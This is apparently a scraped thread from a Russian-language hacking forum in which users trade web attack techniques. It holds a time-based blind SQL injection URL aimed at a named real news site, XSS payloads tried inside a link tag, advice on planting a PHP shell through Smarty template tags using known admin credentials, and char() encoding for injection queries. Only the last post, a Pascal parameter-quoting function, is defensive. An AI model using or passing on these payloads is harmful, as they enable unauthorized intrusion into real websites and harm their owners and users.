С помощью BENCHMARK-ка только получилось http://www.yerevan.ru/news/print.php?id=128%20and%20id=IF(SUBSTRING(version(),1,1)=4,1,BENCHMARK(299971,MD5(NOW())))
Можно ли в теге <a href="123" <здесь> " target="_blank" class="bb-url"> 234 </a> вставить javascript, который будет исполняться сразу при заходе на страницу(не выпонляя никаких действий)? Пробовал следующие варианты, но безрезультатно... Code: style=background-image:url(javascript:alert(1);) sss='alert(1);this.sss=null' style='top:expression(eval(this.sss);)' style=url(javascript:alert(1);)
fobofob, вот здесь подробней http://forum.antichat.ru/thread35207.html смысл в использовании подзапросов, т.е. если логическое выражение SUBSTRING(version(),1,1)=4 правильное, то просто id сравнивается с 1, а если неправильное, то выполняется BENCHMARK(299971,MD5(NOW())), а это достаточно долго, т.е если логическое выражение правильное, то запрос выполнится сразу, а если неправильное, то "загрузка" страницы ненадолго "зависнет"
Видимо, нет. Рад был бы ошибиться. Для тэга A разве что прописать события onclick, onmouseover и т.д., но минусы тут очевидны - потребуется какое-то действие от пользователя
А если я знаю логин и пасс от админки google, как мне туда шелл залить?? PS ближе к телу, какой движок. Попробуй залить вместо видео =/
Если подписано внизу страницы что-то типа Powered by *** Или надо искать по дорку такие же движки, где подписано...
в том дело что нет поверед бай, и в админке нет. В админке могу редактировать наблоны *.tpl, знаю их полный адрес
Тогда это что-то типа clipshare или vshare youtube clone. Если редактирование получается, тогда вставляй между тегами {php}{/php} произвольный php код, это шаблоны smarty скорее всего. На странице, темплейт которой ты отредактируешь - код будет исполняться.
Ты немного не правильно понимаешь процедуру кодировки через char(). В скул-запросе чар используется следующим образом +from+information_schema.columns+where+table_name=char(ascii,ascii,...,) например +from+information_schema.columns+where+table_name=char(116,101,115,116)/* char(116,101,115,116)=test БЕЗ ковычек.
SQL-инъекция Code: statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';'; function QuoteParam(s : string) : string; { на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами } var i : integer; Dest : string; begin Dest := '"'; for i:=1 to length(s) do case si of ' : Dest := Dest + '\; '"' : Dest := Dest + '\"'; '\' : Dest := Dest + '\\'; else Dest := Dest + si; end; QuoteParam := Dest + '"'; end;